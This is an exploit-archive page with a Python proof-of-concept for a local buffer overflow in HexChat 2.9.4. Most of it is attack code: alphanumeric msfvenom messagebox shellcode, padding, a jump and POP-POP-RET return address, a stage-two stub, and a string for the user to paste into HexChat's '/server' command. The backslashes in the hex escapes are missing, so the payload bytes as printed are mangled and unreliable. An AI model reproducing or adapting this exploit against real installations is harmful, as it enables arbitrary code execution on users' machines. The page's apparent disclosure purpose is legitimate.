HexChat 2.9.4 Local Exploit Submission

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HexChat 2.9.4 Local Exploit Submission
# Published : 2013-04-07
# Author :
# Previous Title : PonyOS 0.4.99-mlp - Multiple Vulnerabilities
# Next Title : VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability

#!/usr/bin/python
# HexChat 2.9.4 Local Exploit
# Bug found by Jules Carter < @iMulitia >
# Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com >
# http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html
junk1 = "B"*30
shellcode = (
# msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x78x59x68x6bx6dx4bx4bx69"
"x44x34x64x64x59x64x74x71x78x52x6cx72x33x47x34"
"x71x78x49x42x44x4ex6bx50x71x50x30x4ex6bx64x36"
"x54x4cx4cx4bx44x36x77x6cx4cx4bx33x76x77x78x4c"
"x4bx73x4ex51x30x4ex6bx75x66x56x58x72x6fx72x38"
"x51x65x68x73x43x69x37x71x38x51x39x6fx58x61x73"
"x50x4ex6bx30x6cx36x44x77x54x6cx4bx42x65x75x6c"
"x6ex6bx73x64x36x48x31x68x46x61x6ax4ax4ex6bx52"
"x6ax66x78x6ex6bx73x6ax57x50x43x31x7ax4bx6dx33"
"x34x74x42x69x6cx4bx47x44x4cx4bx67x71x48x6ex74"
"x71x6bx4fx36x51x79x50x6bx4cx4ex4cx4cx44x39x50"
"x34x34x75x57x49x51x4ax6fx36x6dx67x71x4ax67x5a"
"x4bx5ax54x67x4bx71x6cx61x34x34x68x32x55x6dx31"
"x6ex6bx33x6ax47x54x76x61x38x6bx71x76x4cx4bx64"
"x4cx52x6bx4ex6bx71x4ax67x6cx67x71x4ax4bx4ex6b"
"x74x44x4cx4bx76x61x69x78x4ex69x62x64x66x44x47"
"x6cx63x51x5ax63x6ex52x33x38x61x39x69x44x6bx39"
"x59x75x6cx49x58x42x73x58x4ex6ex72x6ex56x6ex58"
"x6cx62x72x4dx38x4fx6fx6bx4fx69x6fx69x6fx4fx79"
"x61x55x75x54x6dx6bx31x6ex4ex38x79x72x70x73x6f"
"x77x45x4cx45x74x70x52x39x78x6cx4ex4bx4fx49x6f"
"x59x6fx6fx79x43x75x55x58x73x58x62x4cx70x6cx51"
"x30x77x31x53x58x67x43x54x72x66x4ex61x74x71x78"
"x52x55x44x33x62x45x61x62x6dx58x51x4cx75x74x57"
"x7ax4cx49x58x66x73x66x6bx4fx30x55x47x74x6bx39"
"x4fx32x72x70x4dx6bx39x38x6dx72x72x6dx4fx4cx4b"
"x37x35x4cx67x54x30x52x5ax48x75x31x39x6fx6bx4f"
"x39x6fx33x58x42x4fx34x38x53x68x31x30x72x48x35"
"x31x73x57x61x75x62x62x35x38x72x6dx72x45x54x33"
"x62x53x54x71x69x4bx6fx78x33x6cx75x74x54x4ax6f"
"x79x78x63x61x78x72x78x45x70x77x50x75x70x70x68"
"x72x6dx50x53x37x36x77x51x70x68x43x42x30x6fx42"
"x4dx71x30x35x38x52x4fx66x4cx31x30x61x76x61x78"
"x71x58x50x65x42x4cx32x4cx55x61x5ax69x6ex68x72"
"x6cx61x34x44x50x4fx79x4dx31x56x51x4bx62x33x62"
"x61x43x46x31x52x72x39x6fx58x50x46x51x49x50x42"
"x70x69x6fx36x35x34x48x41x41"
)
junk2 = "A"*(13306-len(shellcode))
stage1 = "x4cx4cx77x21" # 21 byte jump (JA)
ret = "x63x64x62x68" # ASCII PPR
junk3 = "C"*29
stage2 = "x61"*38 # POPAD x 38
stage2 += "x54" # PUSH ESP
stage2 += "xE9" # RETN # This byte is a bad char, but gets converted to RETN and x88
junk4 = "D"*11586

print "Copy this text, and enter into HexChat's textbox: "/server [string]"" 
print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4